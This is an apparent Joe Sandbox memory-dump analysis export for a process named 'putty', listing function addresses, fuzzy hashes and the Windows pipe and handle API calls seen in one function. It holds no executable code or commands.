Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd34110becf4c409156b112ab4c3d18017b1ff12a8eca9c1d9ee9b346f46efa9
Instruction ID: 35b2352c876939462f636f390d13b822939254bfa886b45024d5cd767f52405a
Opcode Fuzzy Hash: cd34110becf4c409156b112ab4c3d18017b1ff12a8eca9c1d9ee9b346f46efa9
Instruction Fuzzy Hash: BA02177AD002258BCB25DF28C8927BBB7B2FF85324F194158D846EB395F739A901C791

Function 02879525 Relevance: .6, Instructions: 594COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccbcfed46004b79f75f83eaa62cb2dea971bd5db991e844b51a68ecf851c300b
Instruction ID: 9916571bdb27e3962f19bb3884c46dbe264ea1d8a5b1093481e986fa0e75ddca
Opcode Fuzzy Hash: ccbcfed46004b79f75f83eaa62cb2dea971bd5db991e844b51a68ecf851c300b
Instruction Fuzzy Hash: D712D43A6097118BD724DF18D8807BBB3E2EFC5319F19892DD98AC7291DB34E455CB42

Function 028779C5 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9da168f0b4dbf9cbd7a2b9d0bf73b52ea6ba2d9890afecdfc105936fa1c8c95
Instruction ID: fca46a63a32cfd494c06dfd4f8ef598541395e96f2a01ec978b589275ec3e1bc
Opcode Fuzzy Hash: f9da168f0b4dbf9cbd7a2b9d0bf73b52ea6ba2d9890afecdfc105936fa1c8c95
Instruction Fuzzy Hash: 90F1AF3A6087418FD724CF29C88066BFBE6AFD9304F08982DE5D987751E635E844CB52

Function 02898465 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09e61de9d5f3470794dbcbb1e5035a7f08c7f0ef1f03d1eb76d05d5a663b89f
Instruction ID: 45f570dd3e0745da3fb2001ffb4fa1d21ea07465e711faa742e8326dd32f2c17
Opcode Fuzzy Hash: d09e61de9d5f3470794dbcbb1e5035a7f08c7f0ef1f03d1eb76d05d5a663b89f
Instruction Fuzzy Hash: AFB1297EA042569BDF18CE68C8816BB77A2EF87314F1C842DE945DB381EB39D805C791

Function 02891415 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad669a84d5aa817b9d541024f665cd7f24b5069b792c79f4400eaefbb51c5753
Instruction ID: ca83d7b6487dbf75dd4a4eb02ceb20dbce63c78affe3ea4b9ad082bd833d7778
Opcode Fuzzy Hash: ad669a84d5aa817b9d541024f665cd7f24b5069b792c79f4400eaefbb51c5753
Instruction Fuzzy Hash: 5A612B39A0C3915FC725CF38C850A2E7BE1AF96314F4D86ADE89D8B392D671D805C792

Function 028742F5 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b271f629483c1420e33fe04ee805eb1c37fa931ab0737399344f7e08730c4c4
Instruction ID: 97f7bc468a1ea959d30e0c16109735902bd1751569cbadb3c7b4e60b04f5c41c
Opcode Fuzzy Hash: 4b271f629483c1420e33fe04ee805eb1c37fa931ab0737399344f7e08730c4c4
Instruction Fuzzy Hash: C7618DB89047019FE7149F28ED4870ABBF5BF4132DF144738F5AA962A1D371E524CB8A

Function 028ADA50 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb977196e05ad2ad8eac5082a8392ab95a76e76e0865c29d48b7070d286c299b
Instruction ID: 0a06c4db134a8b990b0863f936bc37fac31f7649cd4343cd89341dd3c590be40
Opcode Fuzzy Hash: fb977196e05ad2ad8eac5082a8392ab95a76e76e0865c29d48b7070d286c299b
Instruction Fuzzy Hash: 8031EB3EA145108BEB6CCB28CC5297A7363EB97214715966CD926EBB54DB32EC10CBC4

Function 028AF4F5 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f37a3245d2aee24fcfc55f896b25354d4e5e1b9476d56d6beb319c074b50b39
Instruction ID: ea7913d566dc41b396a41942f346c6204dbd1cb19e03ff8a202f3b076834af90
Opcode Fuzzy Hash: 0f37a3245d2aee24fcfc55f896b25354d4e5e1b9476d56d6beb319c074b50b39
Instruction Fuzzy Hash: B131863B6087184B9318AE69895226AF3C25BC6214F09D17D9A99DB292EE79CC014285

Function 028875E4 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08e51ef407762560b8b123a9d0a98062d65f9a6b5603382bde9bd449df7fa95
Instruction ID: 4eb5273b8c5fae632f2b84ddb910879a956f0b7b9770145a4b8cb75d7c2edb8a
Opcode Fuzzy Hash: a08e51ef407762560b8b123a9d0a98062d65f9a6b5603382bde9bd449df7fa95
Instruction Fuzzy Hash: C121233DA140449BDB08EF78C841ABAF7B2EB4B305F389438D102DB295EB38C801DA04

Function 028ADBF1 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc6b53ff9c7589773157bfd6f35dbaeddf5465db03be58bd4cc4d6560ed108f
Instruction ID: 4985c757668b52854b84a23704b94c7009af1246bfdc6e94670e4663db8a0777
Opcode Fuzzy Hash: ebc6b53ff9c7589773157bfd6f35dbaeddf5465db03be58bd4cc4d6560ed108f
Instruction Fuzzy Hash: 9331277DA542228BEB2CDB24C4726BA33F2EF4A304748549DC983EB755DF686901C754

Function 0287175B Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction ID: 653287d827e1b831fbf2844357a7520531b3d00b2caeb780d03f9541185d07f2
Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction Fuzzy Hash: AD515078E01209DFCB08CF88C594AAEB7B1FF88314F248199D819AB755D731EE51DB94

Function 02887688 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bd24cdd2ce732e5fa1cb05665779483072a444d2ac9f0e08b1c25187f37dad
Instruction ID: 881ced5c5db00e4b76d0be7fa6a5dc4fcc7449d21b56d88b165a92586e7b3697
Opcode Fuzzy Hash: c9bd24cdd2ce732e5fa1cb05665779483072a444d2ac9f0e08b1c25187f37dad
Instruction Fuzzy Hash: 0C21D63D6151844FDB08EF79C852ABAF7B2EB5B305B388478D046CB695EB38C901DB45

Function 02887E47 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546ab11079cec9267782b4b2194fecafee66a4df415b8e6ab2d3b7422e16e21f
Instruction ID: b934729835da7f59ad061fdae47017b2e7ca7eaa13d884dbced77f55a6d5fafe
Opcode Fuzzy Hash: 546ab11079cec9267782b4b2194fecafee66a4df415b8e6ab2d3b7422e16e21f
Instruction Fuzzy Hash: C831E3BAA193508BD3249F29CC457ABB2E2FF96315F188A2CD499CB3A0E7758500C746

Function 0289B39B Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8299be47096f74440c3409f11af00e8be07b828f5952f2dab037c0b5c14a4762
Instruction ID: 79468143189d0a0b249055d038929026c3bf4d0e67f6534abfbe80988a8cf17b
Opcode Fuzzy Hash: 8299be47096f74440c3409f11af00e8be07b828f5952f2dab037c0b5c14a4762
Instruction Fuzzy Hash: 8A21BD79108300CFDB108F58C85136BB7B2EF86325F18895CE4999B3A0E7389801DB56

Function 028874E9 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b19149ab9cfd03dd34f8ebcdacd2aa52174e0be2cc4455ac1f2a594d78fbc0
Instruction ID: 2460b2fdd644e204d30d6231a01226645b6931eab7de1ef88f50a1aa4c661c86
Opcode Fuzzy Hash: 76b19149ab9cfd03dd34f8ebcdacd2aa52174e0be2cc4455ac1f2a594d78fbc0
Instruction Fuzzy Hash: D511047DA140459BDB08EF68C852BBAB7B2EB0A309F345434D102DB294EB39CA50DB55

Function 028ADD23 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4b994b5da32e2d757928eaf9f5fac78dfa1b4a583d63708cc40b1b96d34726
Instruction ID: 4772bd3a249ef7f4077aa7f54e340c1b4b2ba36536d4ea73f95cd0786f134b89
Opcode Fuzzy Hash: 2b4b994b5da32e2d757928eaf9f5fac78dfa1b4a583d63708cc40b1b96d34726
Instruction Fuzzy Hash: 3621967DA402149BEB94CF58CC41FAD77B3B78A710F149514E511FB6D4CB75A802CB94

Function 0287175A Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: 4d2fa5530ee6e13785960a05382ed12f682b424fadfbc917fa1e53cf49b17724
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: B0316278E00119DFCB08CF98C594AAEBBB1FF48314F248599D815AB745D735EA82CF94

Function 028A6175 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 37f3317b92defda0ce399a42d428eb0888f2110784c5955e74c99dac21d35bc9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: C611293BE041E40DD7128D3C8850564BFA70A93139B1D83A9F4F8DB2D7EA228D8B8354

Function 0289C245 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e41236e79178208c82025e9cea0d86635f4f4d2fbdf69e409f84ad2c10bde12b
Instruction ID: bf03542d023b193d78c5ffe9b7e12c8d18da3232862514470300ab5fe3e573f6
Opcode Fuzzy Hash: e41236e79178208c82025e9cea0d86635f4f4d2fbdf69e409f84ad2c10bde12b
Instruction Fuzzy Hash: 7F0152BD6003019BDF60AED994C472BB2AA6B89F04F1C453DD808D7240DB66E8058692

Function 0289AD8F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6562f5cc6f8c71447e1c0116eb8b3f06e6f8a894df57e4cf8c11b62bf4f4c077
Instruction ID: 3b84c2dc83b998eff478ea62451572da6ed5f68bf96ff9b6f2957545b116dcba
Opcode Fuzzy Hash: 6562f5cc6f8c71447e1c0116eb8b3f06e6f8a894df57e4cf8c11b62bf4f4c077
Instruction Fuzzy Hash: D111E53D9192009FDB5C9F18849293BF7B1EB87300F18646CE58597250DB39EC01CB9A

Function 028AF182 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e89034e2b8bb7ef3da75915f046a13dc7cc9a4ec3bbaa1aef4f3ab720e34840
Instruction ID: 5db4ea532cf8ba26a191baefe6df3d22a41095ecfd7b6404b4035665d73a516d
Opcode Fuzzy Hash: 1e89034e2b8bb7ef3da75915f046a13dc7cc9a4ec3bbaa1aef4f3ab720e34840
Instruction Fuzzy Hash: AEE02B2874D39149E3421B3865800BFFBF197D7724F64EA3CC1D0A3991C22644078707

Function 028AE4F3 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f680f7dcb2801876bd34cbfa59a3b8e3b21020fd9a91aec057c77b87fad3c4ab
Instruction ID: dba5467c214b0d0377698605c04d698e8c1b100c9d45032db227da5b1ab313ba
Opcode Fuzzy Hash: f680f7dcb2801876bd34cbfa59a3b8e3b21020fd9a91aec057c77b87fad3c4ab
Instruction Fuzzy Hash: BD01D63AF6B5814FE315CF3998546A16BA2A753600F5CD17ED480E378ADE34C406C349

Function 0287C3E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38e7c11dcb98208f83435b584ebc5e0335fb0dedc0922fcc2ff97afdb05989e0
Instruction ID: 645b14c0438ff815d640057fae3bb6a00072d96ed4def79e0bce63d3427f5ffc
Opcode Fuzzy Hash: 38e7c11dcb98208f83435b584ebc5e0335fb0dedc0922fcc2ff97afdb05989e0
Instruction Fuzzy Hash: 6CF0BE2C0102029AC3288F04C462273B371FF4729AB04A556E887DB660F7B89580D36C

Function 0289D69B Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40323f9293236bd03685b3e1042857cac7528e2e96fc1201eee50eae17c85bc8
Instruction ID: 85efe86367d6c01f5757fbf8727ef7b43d1fc5289a76969ecf8072bc6eb6d7c4
Opcode Fuzzy Hash: 40323f9293236bd03685b3e1042857cac7528e2e96fc1201eee50eae17c85bc8
Instruction Fuzzy Hash: 3FF04FA410C38047DA115B3895617BBA7E0EB9322DF586E7CC3DAF3292D3348042821E

Function 028AF866 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ee88da7a0b175e655bda19736c63ddbe2c55d6770732939c3019141039f543
Instruction ID: fa48ea0f06ddac36e49ccd85b348d39da80334474c7fd901335c3e6f1e7a2a46
Opcode Fuzzy Hash: c6ee88da7a0b175e655bda19736c63ddbe2c55d6770732939c3019141039f543
Instruction Fuzzy Hash: 55F0A728A083508FF3E10F3854D2BA23B51CB57710F1120ADC486AF262C917981F8B75

Function 028AE7C5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cdb042d1e61b60abcbfabb8b665c6251ab1fa9f787e40aacf7a852b911efc51
Instruction ID: 6385ac4368c426a98ac2a558e6e1cb599a19992b4d8a95e7b439e9f3ae597c1b
Opcode Fuzzy Hash: 6cdb042d1e61b60abcbfabb8b665c6251ab1fa9f787e40aacf7a852b911efc51
Instruction Fuzzy Hash: 3DF0E9386983A14FC3089F3198A09BB7BA6DB87205F48893EF5E2932C1E5398516CB55

Function 028714BB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 6228440e6136e77412a66361467c70048ccbd1b7ead6a07425cd2d72ea2892fd
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 3A01A838A11108EFCB59DF98C198A9DF7B6FB44314F648599D8099B790D730EE41EB90

Function 028AD5DC Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8cd34913ee61e3278c4bdf758ac1769396676249324815aa3aec5ec3cb92c42
Instruction ID: 6dc9cdcd3f03213b2b9e48c25b58eb252d903d7ca5b260932e359f30f78c0a7f
Opcode Fuzzy Hash: a8cd34913ee61e3278c4bdf758ac1769396676249324815aa3aec5ec3cb92c42
Instruction Fuzzy Hash: A8D0A72D6D11015B934C9F09FCE057872339AC321230A7228492847615DE749006C956

Function 028976E8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f218dea57adaf8e7e6f6d6c82919768bf6a22fad22edd59ac93159eda1c2a0
Instruction ID: 2dad2a9132d76b5cae5e6d7a6e8888009b2ef0fcfdba8c9305097c75b57598b4
Opcode Fuzzy Hash: 89f218dea57adaf8e7e6f6d6c82919768bf6a22fad22edd59ac93159eda1c2a0
Instruction Fuzzy Hash: 97B092ADC02410CA90992F543C014AEB0362917F40F042430DC0662240E61AEA1A489F

Function 0289534B Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c400080300907b8005f7df4e01c19ef4b8abfcd26ac9032b38ad6347a96b65
Instruction ID: bcaf2dd073c5f46ff4dcfb9dd6bf58e1269d7080ea9ae964ac43ded08b4eb22c
Opcode Fuzzy Hash: e6c400080300907b8005f7df4e01c19ef4b8abfcd26ac9032b38ad6347a96b65
Instruction Fuzzy Hash: 2EB09238E08241DA8200CF108400439E2B4A38F155F587924801EE3100D360C1058A48

Function 02895355 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4dc4c761260b2a0c457a5e11f1357c3503178e93915da42a4d0e7d3c90369e7
Instruction ID: b39bb36e2ba9ac6f090c5d7a7efff5825c7decc4c25492e2bc1210c8c7d67f28
Opcode Fuzzy Hash: d4dc4c761260b2a0c457a5e11f1357c3503178e93915da42a4d0e7d3c90369e7
Instruction Fuzzy Hash: B6B09234E08300CF8200CF04C040425F3B4A78F211F106514D009A3220C330D5048A48

Function 028AF135 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2870000_putty.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c079b49cd1da3053c2320c51b0bad390723f6d8e73d81baf6fa60cb11bf50b
Instruction ID: cd3549cea0f667fac6759cdf1b9d27293549d890a97948d0b789bc1801a5bc9d
Opcode Fuzzy Hash: 07c079b49cd1da3053c2320c51b0bad390723f6d8e73d81baf6fa60cb11bf50b
Instruction Fuzzy Hash: BFB099B8A08200CBC208CF20E080838F3B8AB0B200F023028C888A3222C220E880CA0A

Function 003263E0 Relevance: 75.5, APIs: 42, Strings: 1, Instructions: 295synchronizationpipeCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 003263F0
ReleaseMutex.KERNEL32(?), ref: 0032640C

Part of subcall function 00326060: WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326072
Part of subcall function 00326060: GetCurrentThreadId.KERNEL32 ref: 00326081
Part of subcall function 00326060: SetEvent.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326092
Part of subcall function 00326060: WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 0032609E
Part of subcall function 00326060: TerminateThread.KERNEL32(?,000000FE,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260AA
Part of subcall function 00326060: CloseHandle.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260BA
Part of subcall function 00326060: CloseHandle.KERNEL32(?,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260CF
Part of subcall function 00326060: CloseHandle.KERNEL32(?,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260DC
Part of subcall function 00326060: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260EB
Part of subcall function 00326060: GetExitCodeProcess.KERNEL32(?,?), ref: 003260F9
Part of subcall function 00326060: CloseHandle.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 0032610D
Part of subcall function 00326060: ResetEvent.KERNEL32(?,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326120
Part of subcall function 00326060: ResetEvent.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326126
Part of subcall function 00326060: ReleaseMutex.KERNEL32(?,?,?,00325FBE,?,?,?,\-@), ref: 00326139

CreatePipe.KERNEL32(?,?,?,00000000), ref: 00326455
GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00326472
GetCurrentProcess.KERNEL32(?,00000000), ref: 00326479
DuplicateHandle.KERNEL32(00000000), ref: 00326482
CloseHandle.KERNEL32(?), ref: 00326492
CloseHandle.KERNEL32(?), ref: 00326498
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003264B3
CloseHandle.KERNEL32(?), ref: 003264C7
CloseHandle.KERNEL32(?), ref: 003264CD
CloseHandle.KERNEL32(?), ref: 003264D3

Strings

D, xrefs: 003265D0

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Handle$Close$ObjectSingleWait$CurrentEventProcess$CreateMutexPipeReleaseResetThread$CodeDuplicateExitTerminate
String ID: D
API String ID: 211623615-2746444292
Opcode ID: c26c7b3ccae67c9d954957b9b29f65f9218725189a27c08d09d4ac05f33bc8ad
Instruction ID: 92d0ae0712deb35ea3179654f08f4d1a4e87daa3ef81ac4279928994851c04d3
